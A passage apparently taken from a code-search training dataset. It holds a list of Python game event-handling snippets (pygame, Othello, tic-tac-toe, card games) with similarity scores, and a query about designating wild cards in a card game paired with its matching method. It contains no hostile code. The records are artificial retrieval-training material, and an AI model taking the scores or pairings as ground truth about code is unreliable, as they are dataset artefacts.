coordonée pixel écran en coord grille de jeu\r\n y = event.y // 100\r\n if ( (x<0) or (x>2) or (y<0) or (y>2) ) : return\r\n \r\n print(\"clicked at\", x,y)\r\n hasPlay = Play(x,y,player) # on regarde si le joueur a jouer correctement\r\n if hasPlay:\r\n newPlayer() # dans ce cas là on change de joueur \r\n winner = Victoire()\r\n if (winner or MatchNul()):\r\n Dessine(winner)\r\n Window.update()\r\n Window.after(3000)\r\n ResetGame(winner)\r\n Dessine(winner)\r\n return\r\n Dessine(winner)\r\n if hasPlay: # si le joueur a bien joué, alors c'est au tour de l'ia\r\n Window.update()\r\n Window.after(3000)\r\n thisIsIA()", "def _check_keyup_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.rocket.moving_right = False\n elif event.key == pygame.K_LEFT:\n self.rocket.moving_left = False\n elif event.key == pygame.K_UP:\n self.rocket.moving_up = False\n elif event.key == pygame.K_DOWN:\n self.rocket.moving_down = False", "def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n self.sleep_time = 0\n return\n\n if event.type == pygame.MOUSEBUTTONUP:\n pos = pygame.mouse.get_pos()\n\n if self.button.collidepoint(pos):\n if self.state == \"solving\":\n self.state = \"stopping\"\n\n if self.state == \"solved\":\n self.state = \"waiting\"\n self.puzzle_state = \"solving\"\n self.button_text = \"Solve!\"\n self.board = self.original_board.copy()\n\n elif self.state == \"waiting\":\n self.state = \"solving\"\n self.button_text = \"Stop!\"\n self.button_color = BUTTON_COLOR_STOP\n\n isSolved = self.solve()\n\n self.button_color = BUTTON_COLOR_SOLVE\n if isSolved:\n self.state = \"solved\"\n self.button_text = \"Clear\"\n self.puzzle_state = \"solved\"\n else:\n if self.state == \"stopping\":\n self.state = \"waiting\"\n self.button_text = \"Solve!\"\n self.puzzle_state = \"solving\"\n else:\n self.state = \"solved\"\n self.button_text = \"Clear\"\n self.puzzle_state = \"failed\"", "def main():\n\tglobal FPSCLOCK, DISPLAYSURF, BASICFONT\n\tpygame.init()\n\tFPSCLOCK = pygame.time.Clock()\n\t# set up the window\n\tBASICFONT = pygame.font.Font('freesansbold.ttf', 20)\n\tDISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), 0, 32)\n\tpygame.display.set_caption('Othello')\n\tDISPLAYSURF.fill(BGCOLOR)\n\t#Initialization of the variable\n\t###############################\n\ttestg = 0 #variable to contain result of testwinner\n\tboard = init_board() #variable to contain the board\n\tturn = 1 # whose turn is it {1: black, 2: white}\n\tdrawBoard()\n\twhile True:\n\t\tclicked_box = () #init\n\t\tlegals = possible(board,turn)\n\t\tfor e in pygame.event.get():\n\t\t\tif e.type == QUIT: #handling quitting\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\t\telif e.type == MOUSEBUTTONUP: #handling click\n\t\t\t\tmousex,mousey = e.pos #record a click and its position\n\t\t\t\tclicked_box = isInBoard(mousex,mousey)\n\t\tif clicked_box != () and clicked_box in legals:\n\t\t\t#if it the clicked box is a legal move, make the move\n\t\t\tplayer_move = Move(clicked_box,turn, board)\n\t\t\tplayer_move.make(board)\n\t\t\twinner = test_winner(board)\n\t\t\tif winner: #if true : game is not done\n\t\t\t\t#tests the winner if the game is done\n\t\t\t\tif winner == 1:\n\t\t\t\t\tprint \"Black player winns\"\n\t\t\t\telif winner == 2:\n\t\t\t\t\tprint \"White player wins.\"\n\t\t\t\telif winner == 3:\n\t\t\t\t\tprint \"This is a tie game !\"\n\t\t\t\telse:\n\t\t\t\t\tturn = 2/(winner-3) # if res= 4 it is black's turn if it is 5 it is white's turn'\n\t\t\tturn = 2/turn\n\t\tpygame.display.update()\n\t\tFPSCLOCK.tick(FPS)", "def computer_play(self):\r\n # Depending on game flow, helped randomize when smack showed up\r\n # This is more of an Easter Egg than anything.\r\n if (self.tr.disks_on_board != 0 and (self.tr.disks_on_board % 6 == 0 or\r\n self.tr.disks_on_board % 6 == 3) and self.tr.turn_tracker):\r\n self.ai.talk_smack()\r\n # Computer identifies possible moves to analyze\r\n for item in self.tr.computer_moves:\r\n self.ai.coordinate_extractor(item)\r\n # Computer chooses move\r\n choice = self.ai.choose_move()\r\n # Makes play\r\n choice = self.tr.bd.disks[choice[0]][choice[1]]\r\n self.ai.moves_reset()\r\n choice.color, choice.display_on = 1, True\r\n choice.chain()\r\n # Checks for player move, if none, checks for another move\r\n self.tr.board_scan_reset()\r\n if not self.tr.board_scan():\r\n return\r\n else:\r\n self.tr.board_scan_reset()\r\n if self.tr.board_scan():\r\n self.delay = frameCount\r\n return\r\n # If none, ends game\r\n else:\r\n if not self.tr.game_over:\r\n self.tr.board_scan_reset()\r\n self.tr.scanner()\r\n self.tr.game_over = True\r\n self.tr.run_game_is_over = frameCount", "def check_events_build_deck_screen(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user):\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n\n for i in range(1,8):\n if Rect(100 + 145*(i-1),130,130,180).collidepoint(pygame.mouse.get_pos()):\n build_deck_screen_add_card_to_deck(str(i),screen, screen_status,card_database_filter, user)\n for i in range(8,15):\n if Rect(100 + 145*(i-8),330,130,180).collidepoint(pygame.mouse.get_pos()):\n build_deck_screen_add_card_to_deck(str(i),screen, screen_status,card_database_filter, user)\n\n for i in range(1,7):\n if Rect(245 + 145*(i-1),600,130,180).collidepoint(pygame.mouse.get_pos()):\n build_deck_screen_remove_card_from_deck(str(i),screen, screen_status,card_database_filter, user)\n\n # ok sign on warning\n if Rect(1100, 62, 40, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.build_deck_screen_end_screen_warning_button_display = ''\n\n elif rect_union(buttons).collidepoint(pygame.mouse.get_pos()):\n for button in buttons:\n if button.rect.collidepoint(pygame.mouse.get_pos()):\n\n if button.text == 'Save':\n build_deck_screen_save_deck_to_file(screen,buttons, screen_status, button_status, card_database_filter, user)\n if button_status.build_deck_screen_end_screen_warning_button_display == '':\n screen_status.build_deck_screen_display = False\n screen_status.prepare_screen_display = True\n\n\n elif button.text == 'Back':\n screen_status.welcome_screen_display = True\n screen_status.build_deck_screen_display = False\n screen_status.battle_screen_display = False\n elif button.text == '>>':\n screen_status.build_deck_screen_card_gallery_page_id += 1\n elif button.text == '<<':\n screen_status.build_deck_screen_card_gallery_page_id -= 1\n elif button.text == 'Character':\n card_database_filter.character = not card_database_filter.character\n elif button.text == 'Bowman':\n card_database_filter.bowman = not card_database_filter.bowman\n elif button.text == 'Magician':\n card_database_filter.magician = not card_database_filter.magician\n elif button.text == 'Thief':\n card_database_filter.thief = not card_database_filter.thief\n elif button.text == 'Warrior':\n card_database_filter.warrior = not card_database_filter.warrior\n elif button.text == 'Jobless':\n card_database_filter.jobless = not card_database_filter.jobless\n elif button.text == '>':\n screen_status.build_deck_screen_my_deck_page_id += 1\n elif button.text == '<':\n screen_status.build_deck_screen_my_deck_page_id -= 1\n\n\n elif event.type == pygame.MOUSEMOTION: # Mostly for zoom in\n x = 0 # indicator helps remove zoom in.\n\n # Card gallery\n for i in range(1,8):\n if Rect(100 + 145*(i-1),130,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'card gallery'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n for i in range(8,15):\n if Rect(100 + 145*(i-8),330,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'card gallery'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n # Hand zoom\n for i in range(1,7):\n if Rect(245 + 145*(i-1),600,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'hand'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n if Rect(65,600,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'character'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n if x == 0:\n button_status.card_zoom_active = False\n\n\n\n elif event.type == pygame.MOUSEBUTTONUP:\n pass", "def events(num_of_frame, event):\r\n global name, score, code, balls_pool, targets_left, finished, have_friend_param, FPS\r\n if num_of_frame == 0: # first window, enter your name\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_BACKSPACE:\r\n name = name[:-1]\r\n else:\r\n name += event.unicode\r\n name = name.rstrip()\r\n elif num_of_frame == 1: # second window, the game itself\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n click(event)\r\n draw_text(screen, \"Score: \" + str(score), screen_height // 10, screen_width // 2, 0)\r\n elif event.type == pygame.KEYDOWN:\r\n code += event.unicode\r\n if \"i want to win\" in code:\r\n score = 9999998\r\n finished = True\r\n leaderboard_changing()\r\n FPS //= 10\r\n elif \"fuck you\" in code:\r\n score = -9999998\r\n finished = True\r\n leaderboard_changing()\r\n FPS //= 10\r\n elif \"kill star\" in code:\r\n if balls_pool[0][6]:\r\n balls_pool[0][6] = 0\r\n targets_left -= 1\r\n elif \"i have a friend\" in code:\r\n have_friend_param = True\r\n balls_pool[0][7] = 0\r\n balls_pool[0][8] = 0\r\n print(code)\r\n # third and last windows do nothing except waiting for closing\r", "def _check_keyup_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False # moving right key released, stop moving\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False # moving left key released, stop moving", "def _handle_events(self) -> (bool, bool):\n for event in pygame.event.get():\n if event.type == QUIT:\n # Handle whether we should quit\n return True, True\n elif event.type == KEYDOWN and not self._moved_this_frame:\n # If the user pushed a button this frame and the user has not moved this frame, let's move\n done, should_quit = self._handle_keydown_event(event.key)\n self._moved_this_frame = True\n if done and should_quit:\n return True, True\n elif done:\n return True, False\n\n\n # Now check all the keys that are pushed down (i.e., buttons that were not pushed this frame but are nevertheless pushed down)\n # But only do so if we haven't already moved this frame.\n if self._moved_this_frame:\n return False, None\n\n keys_pressed = pygame.key.get_pressed()\n for key in [K_DOWN, K_LEFT, K_RIGHT, K_UP, K_ESCAPE]:\n if keys_pressed[key]:\n done, should_quit = self._handle_keydown_event(key)\n self._moved_this_frame = True\n if done and should_quit:\n return True, True\n elif done:\n return True, False\n\n return False, None", "def event11510240():\n header(11510240, 1)\n end_if_client()\n\n skip_if_event_flag_off(2, EVENT.PaleEyeOrbReturned) # Pale Eye Orb must be returned.\n skip_if_event_flag_off(1, EVENT.SensGolemDead) # Sen's Golem must be dead.\n skip(2)\n chr.disable(1510100)\n end()\n\n if_in_world_area(0, 15, 1)\n if_time_elapsed(0, 5.0)\n if_event_flag_off(2, 11515050)\n if_action_button_state(2, 'character', 1510100, 180.0, -1, 7.0, 10010200)\n if_condition_true(0, 2)\n skip_if_singleplayer(2)\n message.dialog(10010194, ButtonType.ok_cancel, NumberButtons.no_button, -1, 3.0) # New message\n restart()\n skip_if_event_flag_on(2, EVENT.DarkAnorLondo)\n cutscene.play_cutscene_and_warp_player(150130, CutsceneType.skippable, 1502500, 15, 0)\n skip(1)\n cutscene.play_cutscene_and_warp_player(150132, CutsceneType.skippable, 1502500, 15, 0)\n wait_frames(1)\n restart()", "def human_expert(_obs):\n\n while True:\n env.render()\n print_play_keys(env.action_str)\n time.sleep(0.2)\n key_pressed = keyboard.read_key()\n # return index of action if valid key is pressed\n if key_pressed:\n if key_pressed in KEY_ACTION_DICT:\n return KEY_ACTION_DICT[key_pressed]\n elif key_pressed == \"esc\":\n print(\"You pressed esc, exiting!!\")\n break\n else:\n print(\"You pressed wrong key. Press Esc key to exit, OR:\")", "def _check_keydown_events(self, event):\n # print('key pressed was ', (event))\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True # move ship to the right\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True # move ship to the left\n elif event.key == pygame.K_q: # quit is Q is pressed\n sys.exit() \n elif event.key == pygame.K_SPACE:\n self._fire_bullet()", "def handle_mouse_press(self, event):" ]
[ "0.7081879", "0.6245746", "0.61995095", "0.61223036", "0.5956481", "0.58805364", "0.5852858", "0.5740237", "0.57229996", "0.57229334", "0.57194364", "0.571404", "0.5688867", "0.56664747", "0.5663727", "0.56603277", "0.56460625", "0.5638092", "0.5631298", "0.5616782", "0.5612591", "0.5601155", "0.55901194", "0.55827737", "0.5577245", "0.5572238", "0.556428", "0.5536535", "0.55344665", "0.55284804", "0.55205363", "0.5519296", "0.55169904", "0.5516169", "0.5512897", "0.55100965", "0.5506286", "0.55007434", "0.5500421", "0.546489", "0.5464771", "0.54595345", "0.54531306", "0.5451058", "0.5449895", "0.54453313", "0.5442165", "0.54265976", "0.54224324", "0.54220015", "0.5415356", "0.54140586", "0.5410896", "0.5410117", "0.5390476", "0.53861964", "0.5385729", "0.53790903", "0.53749245", "0.5365261", "0.5362909", "0.5360766", "0.53603387", "0.5359281", "0.53457373", "0.5343961", "0.53384423", "0.5338166", "0.5333677", "0.53274995", "0.5325219", "0.53245044", "0.5317266", "0.5314904", "0.5313454", "0.53115547", "0.53060836", "0.5302085", "0.52957654", "0.5280101", "0.527833", "0.5277101", "0.52753276", "0.52680755", "0.5265743", "0.5262759", "0.5261804", "0.526162", "0.52598506", "0.525849", "0.5257549", "0.52572525", "0.5256473", "0.5253176", "0.5249641", "0.524892", "0.5248492", "0.5245635", "0.5245217", "0.5239552" ]
0.7606982
0
This submits the next user input to the controller, In games with Shared_Board = False (e.g. HandAndFoot) key strokes don't do anything unless designating values for prepared wild cards, at which time the mouse is ignored unless you want to clear the prepared cards. In games with Shared_Board = True wilds on board might change designation upon other cards being played. IF designation cannot be handled automatically (= if wild can be at the beginning or end of a run) then it must be designated before play is completed. This is done in nextEvenWildsOnBoard. All other events are ignored until num_wilds == 0 OR play is canceled.
def nextEvent(self): if self.controller._state.rules.Shared_Board: self.num_wilds = len(self.controller.unassigned_wilds_dict.keys()) if self.num_wilds > 0: self.nextEventWildsOnBoard() for self.event in pygame.event.get(): if self.event.type == pygame.QUIT: # The window crashed, we should handle this print("pygame crash, AAAHHH") pygame.quit() quit() if not self.controller._state.rules.Shared_Board and self.num_wilds > 0: wild_instructions = 'Use the keyboard to designate your prepared wild cards \r\n ' wild_instructions = wild_instructions + '(use 0 for 10 and J, Q, or K for facecards).' self.controller.note = wild_instructions pos = pygame.mouse.get_pos() if self.event.type == pygame.MOUSEBUTTONDOWN: self.RuleSetsButtons.ClickedButton(self, pos) for element in self.hand_info: # cannot select prepared cards, so not included in logic below. if element.img_clickable.isOver(pos): if element.status == 1: element.status = 0 element.img_clickable.changeOutline(0) elif element.status == 0: element.status = 1 element.img_clickable.changeOutline(2) elif self.event.type == pygame.MOUSEMOTION: self.RuleSetsButtons.MouseHiLight(self, pos) HandManagement.MouseHiLight(self.hand_info, pos) elif self.event.type == pygame.KEYDOWN: if self.controller._state.rules.Buy_Option: if self.controller.buying_opportunity: if self.event.key == pygame.K_y: self.controller.wantTopCard(True) self.controller.note = 'You have signaled you want to buy the card.' elif self.event.key == pygame.K_n: self.controller.wantTopCard(False) self.controller.note = 'You have signaled you do not want to buy the card.' if not self.controller._state.rules.Shared_Board and self.num_wilds > 0: HandManagement.ManuallyAssign(self)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nextEventWildsOnBoard(self):\n\n if self.controller._state.rules.Shared_Board and self.num_wilds > 0:\n for self.event in pygame.event.get():\n if self.event.type == pygame.QUIT:\n # The window crashed, we should handle this\n print(\"pygame crash, AAAHHH\")\n pygame.quit()\n quit()\n else:\n # in Shared_Board games, check if there are wilds that need to be updated.\n # All other events are ignored until play is finished.\n HandManagement.wildsHiLoGetInput(self)", "def perform_keyboard_actions(self):\n self.handle_keyboard_input()\n self.grid.next_frame()", "def next_cmd(self):\n if not self.validate():\n self.initial_focus.focus_set()\n return\n self.player_ships[self.values[0]] = self.values[1]\n self.num_players += 1\n self.e1.delete(0, END)\n self.buttonbox()\n self.e1.focus_set()\n self.e2.reset()", "def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))", "def play_keyboard_input_game(self):\n self.reset()\n while(not self._exit):\n pg.event.pump()\n self.clock.tick(self.actions_per_second)\n self.check_for_exit()\n self.perform_keyboard_actions()\n self.check_for_end_game()\n self.render()\n self.debug_to_console()\n\n self.cleanup()", "def computer_play(self):\r\n # Depending on game flow, helped randomize when smack showed up\r\n # This is more of an Easter Egg than anything.\r\n if (self.tr.disks_on_board != 0 and (self.tr.disks_on_board % 6 == 0 or\r\n self.tr.disks_on_board % 6 == 3) and self.tr.turn_tracker):\r\n self.ai.talk_smack()\r\n # Computer identifies possible moves to analyze\r\n for item in self.tr.computer_moves:\r\n self.ai.coordinate_extractor(item)\r\n # Computer chooses move\r\n choice = self.ai.choose_move()\r\n # Makes play\r\n choice = self.tr.bd.disks[choice[0]][choice[1]]\r\n self.ai.moves_reset()\r\n choice.color, choice.display_on = 1, True\r\n choice.chain()\r\n # Checks for player move, if none, checks for another move\r\n self.tr.board_scan_reset()\r\n if not self.tr.board_scan():\r\n return\r\n else:\r\n self.tr.board_scan_reset()\r\n if self.tr.board_scan():\r\n self.delay = frameCount\r\n return\r\n # If none, ends game\r\n else:\r\n if not self.tr.game_over:\r\n self.tr.board_scan_reset()\r\n self.tr.scanner()\r\n self.tr.game_over = True\r\n self.tr.run_game_is_over = frameCount", "def _play(self, func):\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n\n while self._board.possible() != []:\n self._board.move_computer()\n print('\\ncomputer movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is computer')\n return\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is human')\n return\n print('\\nwinner is friendship :)')", "def play_human_move(self):\n success, info = self.gms.play_human_move(raw_input('Make your next move\\n'.format('')))\n if success:\n print(self.gms.game.get_board_state_pretty())\n if info['status_code'] == core_constants.GAME_STATUS_HUMAN_MOVE_REQUIRED:\n self.play_human_move()\n elif info['status_code'] in [\n core_constants.GAME_STATUS_OVER_DRAW,\n core_constants.GAME_STATUS_OVER_HUMAN_WINNER,\n core_constants.GAME_STATUS_OVER_COMP_WINNER,\n ]:\n print(self.gms.status_code_message_map[info['status_code']])\n else:\n if info['error_code'] == core_constants.ERROR_CODE_INVALID_MOVE:\n self.play_human_move()", "def inputMove(self):\n # Check if BoardData_update is still opended\n self.checkOpenStatus()\n\n self.genDataFiles(self.player.getCurrentPieceList())\n print(\"PieceRecog.exe\", len(self.player.getCurrentPieceList()))\n\n # Call the recognition function\n os.system(\"PieceRecog.exe \" + str(len(self.player.getCurrentPieceList())))\n\n # Check if BoardData_update is still opended\n self.checkOpenStatus()\n self.player.updateData('src\\\\BoardData_update.csv')\n self.player.getChessPieceList('src\\\\BoardData_update.csv')\n self.pieceList = self.player.getCurrentPieceList()\n # Update the simulation board\n self.playGUI.drawBoard(self.player)\n\n check = self.setNextMove_AB()\n\n if check == 0:\n return True\n\n else:\n pd.DataFrame(self.player.getCurrentPieceList()).to_csv('src\\\\BoardData_update.csv', index=False)\n print(\"Piecelist after Alpha beta: \", self.pieceList)\n return check", "def run_game(self, board):\n run_program = True\n\n while run_program:\n # eventlistener for mouse events\n for event in pygame.event.get():\n if pygame.mouse.get_pressed() and event.type == pygame.MOUSEBUTTONDOWN:\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Get position of mouse.\n (x, y) = pygame.mouse.get_pos()\n\n # Set circle position in the middle of the grid_square.\n draw_x = x - (x % self.square_size) + self.square_mid\n\n # Calculation to get xPosition from selected Mouse xPosition.\n x = x // 80\n\n # Check if column is full before placing. Break out if that's the case.\n if self.check_if_column_full(board, x):\n break\n\n # Calculate the yPosition, where the chip should be placed with various helper methods.\n draw_y = self.height - (self.square_size * self.draw_dict_mapping[self.get_y_pos(board, x)]) + 40\n\n # Check, which players turn it is.\n if self.playerOne:\n # Player Ones turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 1\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 1):\n run_program = False\n self.switch_player()\n else:\n # Player Twos turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 2\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 2):\n run_program = False\n self.switch_player()\n\n if event.type == pygame.KEYDOWN:\n # End the game with escape.\n if event.key == pygame.K_ESCAPE:\n self.draw = True\n run_program = False\n\n # End the Program with the X in the upper right corner.\n elif event.type == pygame.QUIT:\n self.draw = True\n run_program = False\n\n pygame.display.flip()\n self.game_over(self.playerOne, self.draw)\n # wait for given time and end the game\n pygame.time.wait(5000)\n pygame.quit()", "def handle_keyboard_input(self):\n keys = pg.key.get_pressed()\n\n if (keys[K_UP]):\n self.grid.change_direction(Direction.up)\n if (keys[K_DOWN]):\n self.grid.change_direction(Direction.down)\n if (keys[K_LEFT]):\n self.grid.change_direction(Direction.left)\n if (keys[K_RIGHT]):\n self.grid.change_direction(Direction.right)\n if (keys[K_SPACE]):\n self.grid.snake.grow()\n if (keys[K_RIGHTBRACKET]):\n self.actions_per_second += 1\n if (keys[K_LEFTBRACKET]):\n self.actions_per_second -= 1\n if (keys[K_t]):\n self.is_training = True\n print(\"========================================================================\")\n print(\"Training: ON\")\n print(\"========================================================================\")\n if (keys[K_s]):\n self.is_training = False\n print(\"========================================================================\")\n print(\"Training: OFF\")\n print(\"========================================================================\")", "def main():\n board = [\n [' ', ' ', ' '],\n [' ', ' ', ' '],\n [' ', ' ', ' ']\n ]\n counter = 0\n\n while not check_victory(board):\n # This is called the game loop. It keeps the game running until it is finished.\n # On every iteration of the loop we check to see if a player has won.\n\n # Show the board to the player.\n show_board(board)\n\n # Take input to add a new token.\n board = take_input(board, OPTIONS[counter % 2])\n\n counter += 1", "def main():\n board_state = [['_', '_', '_'],\n ['_', '_', '_'],\n ['_', '_', '_']]\n\n player_turn = int(input(\"Who goes first - select AI(0) or Human(1)? \").strip())\n human_marker = input(\"Select marker - 'X' or 'O'? \").strip()\n \n play(board_state, player_turn, human_marker, 0)", "def next_play(self):\n\t\tfor card in self.hand:\n\t\t\tif is_valid(card):\n\t\t\t\tself.play_card(card)\n\t\t\t\treturn card\n\t\tglobal forced_rank\n\t\tif forced_rank == \"2\":\n\t\t\tglobal two_multiplier\n\t\t\tself.draw(two_multiplier)\n\t\t\tprint(f\"{self.name} draws {str(two_multiplier)} cards.\")\n\t\t\ttwo_multiplier = 0\n\t\t\tforced_rank = False\n\t\t\treturn None\n\t\tcard = self.draw(1)[0]\n\t\tprint(self.name + \" draws a card.\")\n\t\tif is_valid(card):\n\t\t\tself.play_card(card)\n\t\t\treturn card\n\t\tprint(self.name + \" passes the turn.\")", "def action_key_press(key, cur_key_type, cur_key, draw, phys, msg, timer, board, force):\n\n\n # delete any old mouse joints prior to dealing with the next keypress\n if key != \"m\" and msg.message != \"Mouse Move\" and cur_key_type == 0:\n for jn in phys.world.joints:\n if type(jn) is b2MouseJoint:\n phys.world.DestroyJoint(jn)\n\n if not key is None and key != \"\":\n if platform == \"linux\" or platform == \"linux2\":\n window = get_active_window_title()\n elif platform == \"win32\":\n window = gw.getActiveWindow().title\n\n if not \"Board\" in window and not \"Toolbar\" in window:\n pass\n else:\n if key == 255:\n pass\n\n elif key == \"r\" and cur_key_type == 0:\n # RESET SCREEN\n if sg.popup_yes_no(\"Are you sure you want to reset?\") == \"Yes\":\n draw.reset()\n msg = Messenger(phys.options[\"screen\"][\"fps\"], board)\n msg.set_message(\"Reset\")\n board.reset = True\n\n elif key == \"q\" and cur_key_type == 0:\n # QUIT\n msg.set_message(\"Quit\")\n val = sg.popup_yes_no(\"Are you sure you want to quit?\")\n if val == \"Yes\":\n board.run = False\n\n\n elif key == \"z\" and cur_key_type == 0:\n # SPAWN\n msg.set_message(\"Spawn\")\n phys.create_block()\n\n elif key == \"u\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Remove Joints\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"x\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Delete\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"p\" and cur_key_type == 0:\n # draw polygon\n draw.reset()\n # msg.set = {\"Dynamic Block\": draw.get_draw_type()}\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Dynamic Block\")\n\n elif key == \"g\" and cur_key_type == 0:\n # draw ground\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Static Block\")\n # options = {\"Static Block\": draw.get_draw_type()}\n\n # cur_key = msg.auto_set(options, key, force)\n\n elif key == \"i\" and cur_key_type == 0:\n # draw terrain\n\n draw.reset()\n options = {\"Generate Terrain\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n draw, phys, board = create_terrain(draw, phys, board=board)\n\n\n elif key == \"f\" and cur_key_type == 0:\n # draw fragments or select\n draw.reset()\n options = {\n \"Fragment Select\": SelectType.select} # \"Fragment Poly\": SelectType.draw, \"Frament Rectangle\": SelectType.rectangle,\n # \"Frament Select\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 0:\n # fire polygon\n draw.reset()\n options = {\"Create\": SelectType.select_point, \"Fire Block\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Joint Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \";\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Player Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Rotate\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"m\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Mouse Move\": SelectType.select, \"Normal Move\": SelectType.null, \"Joint Move\": SelectType.null,\n \"Clone Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"t\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Transform\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"e\" and cur_key_type == 0:\n # draw ropes\n if sg.popup_yes_no(\"Are you sure you want to kill all blocks?\") == \"Yes\":\n draw.reset()\n phys.kill_all(static=False)\n msg.set_message(\"Remove Blocks\")\n cur_key = \"e\"\n\n elif key == \"v\" and cur_key_type == 0:\n # draw ropes\n draw.reset()\n msg.set_message(\"Set Spawn\")\n cur_key = \"v\"\n\n elif key == \"h\" and cur_key_type == 0:\n # draw fragment ALL players\n # cur_key = \"h\"\n msg.set_message(\"Frag All\")\n draw.reset()\n blocks = [bl for bl in phys.block_list if not bl.static is True and not bl.is_terrain is True]\n phys.fractal_block(blocks, create=False, board=board)\n\n elif key == \"k\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Force\")\n\n\n elif key == \"l\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Splitter\")\n\n\n elif key == \"/\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = 